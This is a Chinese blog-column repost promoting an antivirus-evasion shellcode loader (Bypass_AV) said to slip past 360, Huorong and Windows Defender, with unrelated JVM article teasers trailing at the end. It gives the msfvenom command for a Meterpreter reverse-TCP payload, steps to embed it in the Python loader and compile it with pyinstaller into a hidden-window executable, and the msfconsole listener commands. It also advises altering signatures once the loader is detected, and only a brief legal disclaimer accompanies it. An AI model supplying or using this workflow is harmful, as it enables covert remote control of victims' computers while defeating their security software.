免杀ShellCode加载器 ,过360、火绒、Windows Defender

专栏 / 免杀ShellCode加载器 ,过360、火绒、Windows Defender

免杀ShellCode加载器 ,过360、火绒、Windows Defender

2022-05-24 08:10 --阅读 · --喜欢 · 掌控安全学院
粉丝: 2.6万 文章: 1068

零基础学黑客,搜公众号:白帽子左一

Bypass_AV msf免杀,ShellCode免杀加载器 ,免杀shellcode执行程序 ,360&火绒&Windows Defender

代码够简单,估计要不了多久就进特征库了,被杀了再去改几个特征码照样又可以免杀,作者的github保持更新,可以去瞅瞅。


项目地址: https://github.com/Axx8/Bypass_AV


环境

2022年5月8日 测试可以免杀国内杀软 火绒&360及Windows Defender

Windows 10 64位 360&火绒&Windows Defender

Windows 7 64位 或以上操作系统应该都没问题(没有测试)


该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!!


代码未经过大量测试,如发现问题请提交 issue。


使用msfvenom

生成ShellCode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.100 lport=8080 --encrypt base64 -f c

注意:ShellCode 需要是64位的





加载器

将生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 处


注意:保留原始ShellCode 里的双引号 "


示例:


图片


最终格式:


图片


打包成可执行程序


编译

Python 3.8.6

pyinstaller 4.7

pip install pyinstaller

pyinstaller -F -w Bypss_AV.py

生成Bypass_AV.exe在dist目录中


运行监听

msfconsole

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 0.0.0.0

msf6 exploit(multi/handler) > set lport 8080

msf6 exploit(multi/handler) > run


Bypass_360视频

https://user-images.githubusercontent.com/34683107/167286823-a93fdd69-547e-4adc-9ae5-171fb0e919ca.mov


Bypass_火绒 视频

https://user-images.githubusercontent.com/34683107/167286897-a482c486-c3e9-4f69-ae55-98afd2ff1ed7.mov


Bypass_Windows Defender 视频

https://user-images.githubusercontent.com/34683107/167286874-9413611e-c2be-4cfb-ba51-f95ebe5518af.mov


或者直接去作者的 github 上查看

投诉或建议
全网最硬核 JVM 内存解析 - 2.JVM 内存申请与使用流程
个人创作公约:本人声明创作的所有文章皆为自己原创,如果有参考任何文章的地方,会标注出来,如果有疏漏,欢迎大家批判。如果大家发现网上有抄袭本文章的,欢迎举报,并且积极向这个 github 仓库 提交 issue,谢谢支持~另外,本文为了避免抄袭,会在不影响阅读的情况下,在文章的随机位置放入对于抄袭和洗稿的人的“亲切”的问候。如果是正常读者看到,笔者在这里说声对不起,。如果被抄袭狗或者洗稿狗看到了,希望你能够好好反思,不要再抄袭了,谢谢。今天又是干货满满的一天,这是全网最硬核 JVM 解析系列第四篇,往期精彩
全网最硬核 JVM 内存解析 - 5.压缩对象指针相关机制
个人创作公约:本人声明创作的所有文章皆为自己原创,如果有参考任何文章的地方,会标注出来,如果有疏漏,欢迎大家批判。如果大家发现网上有抄袭本文章的,欢迎举报,并且积极向这个 github 仓库 提交 issue,谢谢支持~另外,本文为了避免抄袭,会在不影响阅读的情况下,在文章的随机位置放入对于抄袭和洗稿的人的“亲切”的问候。如果是正常读者看到,笔者在这里说声对不起,。如果被抄袭狗或者洗稿狗看到了,希望你能够好好反思,不要再抄袭了,谢谢。今天又是干货满满的一天,这是全网最硬核 JVM 解析系列第四篇,往期精彩